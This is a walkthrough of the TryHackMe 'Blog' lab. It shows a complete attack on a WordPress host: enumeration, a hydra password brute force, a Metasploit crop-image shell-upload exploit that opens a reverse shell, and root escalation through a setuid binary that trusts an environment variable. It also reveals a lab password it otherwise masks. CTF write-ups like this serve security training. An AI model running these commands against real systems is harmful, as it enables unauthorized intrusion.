BLOG-TRYHACKME

This is a quick write-up for the TryHackMe room named Blog.

The link to the room is: https://tryhackme.com/room/blog

Add an entry to /etc/hosts
==========================
⇒ 10.10.167.75 blog.thm

Enumeration
===========
⇒ nmap -sC -sV 10.10.167.75
• 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
• 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
• 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
• 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
• 8000/tcp open tcpwrapped
• 9000/tcp open tcpwrapped

Dir-busting
==========
⇒ /opt/tools/dirsearch/dirsearch.py -E -x 400,500 -t 100 -u http://10.10.167.75 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --recursive -R 2
• http://10.10.167.75/wp-includes/
• http://10.10.167.75/wp-content/uploads/
• http://10.10.167.75/wp-admin/

WPScan
======
wpscan --url http://10.10.167.75

Possible Users
===========
wpscan --url http://10.10.167.75 --enumerate u
⇒ bjoel
⇒ kwheel

Brute Force Web login
==================
⇒ hydra -l kwheel -P /usr/share/wordlists/rockyou.txt 10.10.167.75 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.167.75%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username" -V
• [80][http-post-form] host: 10.10.29.244 login: kwheel password: *********


Exploit
=======
⇒ Read about CVE-2019-8943
https://www.exploit-db.com/exploits/46662
⇒ exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload
msf5 exploit(multi/http/wp_crop_rce) > set PASSWORD *********
PASSWORD => cutiepie1
msf5 exploit(multi/http/wp_crop_rce) > set RHOSTS 10.10.167.75
RHOSTS => 10.10.167.75
msf5 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf5 exploit(multi/http/wp_crop_rce) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/http/wp_crop_rce) > run

⇒ Got a shell on box

⇒ Ran https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh on the target and got:
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/sbin/checker
---

⇒ Analyzed “/usr/sbin/checker” using Ghidra
undefined8 main(void)
{
    char *pcVar1;

    pcVar1 = getenv("admin");
    if (pcVar1 == (char *)0x0) {
        puts("Not an Admin");
    }
    else {
        setuid(0);
        system("/bin/bash");
    }
    return 0;
}
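To make the weakness in that decompile concrete, here is an added, compilable re-creation of the checker's gate (example code written for this write-up, not the binary from the box). It shows that the check is on the presence of a variable named "admin", not on its value, so an empty admin= passes just like admin=admin, and it puts a hypothetical hardened gate beside it that authorizes on the real uid the kernel supplies instead of on anything the caller controls. The function names, the bitmask probe and the hardened variant are all assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Re-creation of the gate seen in the Ghidra decompile of /usr/sbin/checker.
 * getenv() returns a non-NULL pointer whenever a variable of that name exists,
 * so this passes for admin=admin, admin=1, or even an empty admin=.
 * The value is never compared against anything. */
int checker_is_admin(void)
{
    return getenv("admin") != NULL;
}

/* What the real binary does once the gate passes: setuid(0), then a shell.
 * There is no setgid(0), which is why the shell in the write-up reports
 * uid=0(root) but gid=33(www-data). Only works when the file is setuid root;
 * otherwise setuid(0) fails and we return -1 instead of spawning anything. */
int checker_escalate(void)
{
    if (setuid(0) != 0)
        return -1;
    return system("/bin/bash");
}

/* Hypothetical hardened gate (not on the box): decide on the real uid, which
 * the calling process cannot forge, and ignore the environment entirely.
 * The uid is a parameter so the function can be exercised without root. */
int hardened_is_admin(uid_t real_uid)
{
    return real_uid == 0;
}

/* Walks the vulnerable gate through three constructed environment states and
 * returns a bitmask: 1 = passed with no variable, 2 = passed with admin="",
 * 4 = passed with admin=admin. The presence-only check yields 6. */
int probe_checker_gate(void)
{
    int mask = 0;
    unsetenv("admin");
    if (checker_is_admin()) mask |= 1;
    setenv("admin", "", 1);
    if (checker_is_admin()) mask |= 2;
    setenv("admin", "admin", 1);
    if (checker_is_admin()) mask |= 4;
    unsetenv("admin");
    return mask;
}

int main(void)
{
    int mask = probe_checker_gate();
    printf("checker gate: no variable -> %s, admin=\"\" -> %s, admin=admin -> %s\n",
           (mask & 1) ? "shell" : "Not an Admin",
           (mask & 2) ? "shell" : "Not an Admin",
           (mask & 4) ? "shell" : "Not an Admin");
    printf("hardened gate for real uid %u -> %s\n", (unsigned)getuid(),
           hardened_is_admin(getuid()) ? "shell" : "Not an Admin");
    /* checker_escalate() is deliberately not called here: it would try to
     * become root and drop into /bin/bash, exactly like the real binary. */
    return 0;
}
```

Compile with a plain cc and run it as an unprivileged user: the first line shows the vulnerable gate accepting the empty value, the second shows the hardened gate refusing regardless of what is exported. The point for fixing such a helper is that anything read from the environment (or argv) of a setuid program is attacker-controlled, and a privilege decision has to rest on something the kernel sets, such as getuid() or group membership.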

Privilege Escalation
================
⇒ Set "admin" as an environment variable to get root. The decompiled code only tests whether getenv("admin") returns non-NULL, so any value works (even an empty one); it is the variable's presence, not its contents, that passes the check. Note also that the binary calls setuid(0) but never setgid(0), so the resulting shell is uid 0 while the gid stays 33 (www-data), as the id output below shows.
www-data@blog:/var/www/wordpress$ export admin=admin
----
www-data@blog:/var/www/wordpress$ env
APACHE_LOG_DIR=/var/log/apache2
LANG=C
INVOCATION_ID=d3c286c9b4424d8b9ebc8550ed0c5a13
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/var/www/wordpress
JOURNAL_STREAM=9:20804
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
admin=admin
APACHE_RUN_USER=www-data
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
_=/usr/bin/env
www-data@blog:/var/www/wordpress$
----
www-data@blog:/var/www/wordpress$ /usr/sbin/checker
root@blog:/var/www/wordpress# id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@blog:/var/www/wordpress#


Search for flags
=============
⇒ find / -name root.txt 2>/dev/null
⇒ find / -name user.txt 2>/dev/null

All Done :)